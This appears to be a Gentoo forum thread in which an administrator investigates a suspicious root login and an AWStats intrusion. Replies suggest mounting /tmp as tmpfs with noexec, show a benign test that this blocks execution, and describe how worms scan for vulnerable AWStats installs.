200507-10 [N] Ruby: Arbitrary command execution through XML-RPC ( dev-lang/ruby )
200507-11 [N] MIT Kerberos 5: Multiple vulnerabilities ( app-crypt/mit-krb5 )
200507-16 [N] dhcpcd: Denial of Service vulnerability ( net-misc/dhcpcd )
200507-17 [N] Mozilla Thunderbird: Multiple vulnerabilities ( mail-client/mozilla-thunderbird mail-client/mozilla-thunderbird-bin )
200507-21 [N] fetchmail: Buffer Overflow ( net-mail/fetchmail )
200507-22 [N] sandbox: Insecure temporary file handling ( sys-apps/sandbox )
200507-23 [N] Kopete: Vulnerability in included Gadu library ( kde-base/kdenetwork kde-base/kopete )
200507-25 [N] Clam AntiVirus: Integer overflows ( app-antivirus/clamav )
200507-27 [N] Ethereal: Multiple vulnerabilities ( net-analyzer/ethereal )

/var/log/wtmp
found one wired line : root loged from an unknow box:

Code: Select all

last -a |grep root |less
root     pts/9        Sun Sep 18 14:15 - 21:03 (1+06:47)    noc.au.SOME-HOSTNAME.net

what a pain to dig trought all those log file : pop/smptd/httpd/ftpd/sshd all have a diferent file format
ANY sugestions ?

mod edit: inserted linebreak \ for page formatting --Earthwings

[linux_girl]

If you've got plenty of ram you can mount your /tmp on a tmpfs filesystem.
In this case you don't need to alter any partition tables.
Depending on what apps you're running it'll also be quite a speed up.

You may want to set the maximum size used for the tmpfs. It will only uses the space it requires anyway (grows and shrinks as needed), but setting a max value prevents it from using up to much ram.

hth
cheers
Steven

My server access slowed down so I added the single line you suggested and rebooted:

Code: Select all

tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0

now my fstab looks like this:

Code: Select all

# <fs>                  <mountpoint>    <type>          <opts>                  <dump/pass>
# NOTE: If your BOOT partition is ReiserFS, add the notail option to opts.
/dev/sda1               /boot           ext2            noauto,noatime          1 1
/dev/sda3               /               ext3            noatime                 0 0
/dev/sda2               none            swap            sw                      0 0
/dev/cdroms/cdrom0      /mnt/cdrom      iso9660         noauto,ro               0 0
tmpfs    /tmp    tmpfs    nodev,nosuid,noexec    0 0
none                    /proc           proc            defaults                0 0
none                    /dev/shm        tmpfs           defaults                0 0

I tested to see if I could run executables from the tmp directory.

Code: Select all

hawk tmp # cd /tmp
hawk tmp # cat david.hack
#/bin/sh
echo 'I am runnable'
hawk tmp # ls -l david.hack
-rwxrwxr-x  1 root root 30 Apr 14 02:34 david.hack
hawk tmp # whoami
root
hawk tmp # ./david.hack
-bash: ./david.hack: Permission denied

I couldn't

I made sure mail and apache were working ok and everything tested out fine.
I'm all set. Thanks for the useful advise!

util-linux has a flow : an use re-mount a partion it lose the nosuid,noexec,...
200509-15 [N] util-linux: umount command validation error ( sys-apps/util-linux )

[Bob P]

2)Juste wondering how he hell did they knew about my awstats setup . i mean you cant find my awstat url on any search engine !

i doubt that the bad guys even care to know whether or not you have an AWStats implementation running on your server when they attack it with a script exploit. i think that they just apply a very simple brute strength approach rather than by applying knowledge specific to your system: the bad guys just crawl the web pinging for responses Port 80. their software pays attention when a site responds as yours did; when they find a server on port 80 they apply the worm as an HTML request, indifferent to whether you have awstats running or not. if you DO have AWstats running with PHP enabled, then they exploit your box. if you don't then they don't, and they move along. its pretty simple, really. it amounts to nothing more complex than picking the low-hanging fruit.

my HTTP server logs show that i'm hit by requests from those worms all the time. they never get in, but the logs still show them trying. maybe you should disable PHP in awstats, and generate your reports in a cron job instead.

PS - could somebody fix the page formatting problem?